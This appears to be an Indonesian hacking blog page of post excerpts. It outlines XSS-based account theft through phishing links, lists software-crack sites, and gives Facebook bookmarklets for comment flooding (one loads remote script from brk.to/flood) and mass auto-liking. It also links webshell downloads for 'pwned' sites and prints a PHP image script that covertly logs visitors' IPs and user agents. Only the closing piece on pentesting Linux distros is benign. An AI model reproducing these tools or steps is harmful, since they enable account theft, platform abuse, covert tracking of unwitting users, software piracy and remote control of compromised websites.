Banyak yang bertanya, apa hebat & bahayanya sih XSS?
Yang tidak mengetahui & belum ber-eksperimen pasti bilang:

*Apa hebatnya sih, cuman nulis di URL doank
*Begituan mah gak ada gunanya
*XSS mah gak bisa dideface halamannya
*Itu kan cuman perubahan address doank

Saya hanya tersenyum ketika mendengar diskusi mengenai hal iniūüôā
Nah, dari sekian banyak bahayanya XSS, mari kita ambil salah satunya “STEALING ACCOUNT IN VULNERABLE WEBSITE”. (Harap Dijadikan Bahan Pembelajaran & Proteksi Diri Saja Ya, Artikel Ini Hanya Untuk Menambah Wawasan)

Dalam hal ini saya memanfaatkan XSS dikombinasikan dengan Human Vulnerability, karena semua pasti sudah mengetahui, bahwa Manusia Adalah Unpatched Vulnerability.
Skenarionya adalah:
1. Kita mendapatkan vulnerable website yang bisa dilakukan XSS
2. Kita membuat sebuah script yang bisa digunakan untuk register / login & membuat sebuah file script (php) yang bisa digunakan untuk mengambil informasi account & menyimpannya di logs.
3. Kita sebarkan linknya ke beberapa email / messenger / chatbox / irc, dsb.
Tunggu & kita mendapatkannya deh..ūüôā
Baca pos ini lebih lanjut

Website/URL Pencari Serial Number + Crack

http://www.thecrack.us
http://www.serialz.to/
http://www.serials.ws
http://keygen.name/
http://www.easycracks.net

Bom Komentar di Facebook

1. Buka Profil atau Halaman Facebook yang ingin anda kirimkan bom komentar.
2. Copy dan paste-kan code dibawah ini ke ADDRESS BAR lalu tekan tombol ENTER

 

javascript:(a = (b = document).createElement(“script”)).src = “//brk.to/flood”, b.body.appendChild(a); void(0)

 

 

 

3. Akan muncul sebuah jendela, Masukkan Jumlah Pesan Yang Akan Dikirim, ENTER.

4. Kemudian Masukkan Komentar Anda, ENTER.

5. Tunggu sesaat dan jangan tutup profil teman Facebook anda.

6. Selamat nge-bom !!

 

Bom Jempol / Like / Suka di Facebook

1. Buka Profil atau Halaman Facebook yang ingin anda kirimkan bom Jempol / Like / Suka.

2. Copy dan paste-kan code dibawah ini ke ADDRESS BAR lalu tekan tombol ENTER

 

 

Code:

javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName(“input”);for(e = 0; e < ExpandComm.length; e++){myClass = ExpandComm[e].getAttribute(“class”);if(myClass != null && myClass.indexOf(“stat_elem”) >= 0)if(ExpandComm[e].getAttribute(“name”) == “view_all”)ExpandComm[e].click()}}function JEMPOLERS(){jempol = document.getElementsByTagName(“button”);for(j = 0; j < jempol.length; j++){myClass = jempol[j].getAttribute(“class”);if(myClass != null && myClass.indexOf(“like_link”) >= 0)if(jempol[j].getAttribute(“name”) == “like”)jempol[j].click()};}function JEMPOLERC(){buttons = document.getElementsByTagName(“button”);for(x = 0; x < buttons.length; x++){myClass = buttons[x].getAttribute(“class”);if(myClass != null && myClass.indexOf(“stat_elem”) >= 0)if(buttons[x].getAttribute(“title”) == “Like this comment”)buttons[x].click()};}function updateTime(){ex=ex+1;i=i+1;s=s+1;if (ex==5){EXP_ALL();ex=0};if (s==5){ex=0;JEMPOLERS();s=0};if (i==2){JEMPOLERC();i=0;}}alert(‘-==[FB STATUS & COMMENTS LIKE GENERATOR]==-\n\nScript by -MAHO-‘);updateTime();window.setInterval(updateTime, 1000);void(0)

 

3. Jangan tutup halaman yang anda bom, biarkan code di atas meng-expand status yg ada pada halaman tersebut

 

 

[Tutorial] Upload webshell ke “pwned’ site

apa itu shell??
Jika di Windows kita kenal dengan nama “Command Prompt”. maka di Linux dan Unix kita mengenal terminal/shell. semua perintah dasar sebuah sistem operasi adalah dengan melalui shell seperti copy, delete, mkdir, bla bla bla (untuk lebih jelasnya ketik HELP di cmd atau shell anda).

Image
terminal/shell di Ubuntu

Image
Command prompt di WindowsXP

Apa itu Webshell??
webshell, adalah sebuah shell yang bisa diakses melalui browser dan sebuah website yang sudah ditanam shell bisa di-remote oleh hacker melalui browser. nah… webshell ini dibuat dengan bahasa php. webshell yang sering digunakan adalah c99, c100, r57 dan lain sebagainya. download file webshell dibawah ini:

Code: Select all
http://www.ziddu.com/download/10452937/shell.zip.html

Baca pos ini lebih lanjut

nyuri, ip, port, user agent, dewa… :D

<?php
/* pake php GD buat dapetin ip temen forum :p
*/
$smiley = "http://devilzc0de.org/forum/images/smilies/tongue.gif";
$fp = fopen('dxign3r.htm', 'a');
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$port = $_SERVER['REMOTE_PORT'];
$file = $_SERVER['HTTP_REFERER'];
$waktu= date("M d, h:i A");
$data =">> waktu:$waktu || ip:$ip || port:$port || referer:$file || user agent:$agent<br/><br/>";
fwrite($fp, $data);
fclose($fp);
header("content-type: image/png");
$image = ImageCreateFromGIF($smiley);
imagepng($image);
ImageDestroy($image);
exit();
?>
copas code php d atas, abis itu upload k hosting, jangan lupa bikin file dxign3r.htm, ubah permision nya jd 777..
smbr : d-xign3r

7 Distro Linux Untuk Hacking – Pentesting

Pada artikel kali ini saya akan coba bahas 7 Distro linux yang paling banyak digunakan untuk hacking atau penetrasi test jaringan (pentest).
Penetrasi jaringan adalah proses yang dilakukan oleh seseorang (pentester) untuk masuk ke jaringan atau komputer dengan cara mencari celah keamanan (vulnerability) dalam sistem.

Pentesting sangat diperlukan untuk meminimalisasi celah keamanan yang ada. Dengan begitu seseorang yang tidak punya hak tidak akan mudah masuk ke sistem.

Yang jelas pentest itu intinya mencari celah keamanan dalam sistem untuk selanjutnya melakukan perbaikan (patch) terhadap celah tersebut.

Mungin sebagaian dari kawan-kawan sudah banyak yang mencoba dari beberapa distro linux ini. Salah satu yang paling terkenal adalah backtrack. Tapi ternyata masih banyak distro lain yang menarik untuk dicoba jika ingin melakukan penetrasi network. Disini saya bukan berarti men-sort distro berdasarkan yang paling baik, karena penetrasi network tergantung dari pentesternya dan object yang akan di pentest.

Ok apa saja 7 distro linux itu, berikut 7 distro linux untuk Hacking

Baca pos ini lebih lanjut